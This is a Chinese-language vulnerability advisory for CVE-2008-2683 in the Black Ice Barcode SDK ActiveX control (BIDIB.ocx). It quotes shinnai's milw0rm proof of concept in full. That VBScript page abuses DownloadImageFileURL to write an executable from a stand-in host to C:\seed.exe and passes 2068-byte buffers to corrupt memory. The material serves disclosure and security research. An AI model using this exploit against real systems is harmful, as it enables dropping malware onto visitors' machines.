安全研究
安全漏洞
Black Ice Cover Page ActiveX任意文件下载漏洞
发布日期:2008-06-05
更新日期:2008-06-10
受影响系统:
Black Ice Barcode SDK 5.01描述:
CVE(CAN) ID: CVE-2008-2683
Black Ice Barcode SDK工具包提供各种1D和2D条码功能函数库。
Black Ice Barcode SDK在实现上存在多个安全漏洞,远程攻击者可利用这些漏洞破坏内存下载文件。
<*来源:shinnai (shinnai@autistici.org)
链接:http://secunia.com/advisories/30548/
http://www.exploit-db.com/exploits/5750/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Author: shinnai Published: 2008-06-05 Verified:
Exploit Code: Vulnerable App: N/A
Rating
Overall:
1
2
3
4
5
(0.0)
view sourceprint?
-----------------------------------------------------------------------------
Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download
and Memory Corruption
url: http://www.blackice.com
File : BIDIB.ocx
Ver. : 10.9.3.0
CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}
Mark.: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Windows XP Professional SP3 fully patched, with Internet Explorer 7
Windows 2k Professional SP3 fully patched, with Internet Explorer 6
In memory of rgod
-----------------------------------------------------------------------------
<object classid='clsid:D2797899-BE27-4CDB-892F-4FDC26EA9BA9' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the arbitrary file download test'>
<input language=VBScript onclick=MemoryCorruption() type=button value='Click here to start the memory corruption test'>
<script language='vbscript'>
Sub tryMe
test.DownloadImageFileURL "http://somesite.com/seed.exe", "C:\seed.exe"
End Sub
</script>
<script language='vbscript'>
Sub MemoryCorruption
buff_0 = String(2068, "A")
buff_1 = String(2068, "B")
test.DownloadImageFileURL buff_0, buff_1
End Sub
</script>
# milw0rm.com [2008-06-05]
建议:
厂商补丁:
Black Ice
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.blackice.com/barcode.htm
浏览次数:1680
严重程度:0(网友投票)
绿盟科技给您安全的保障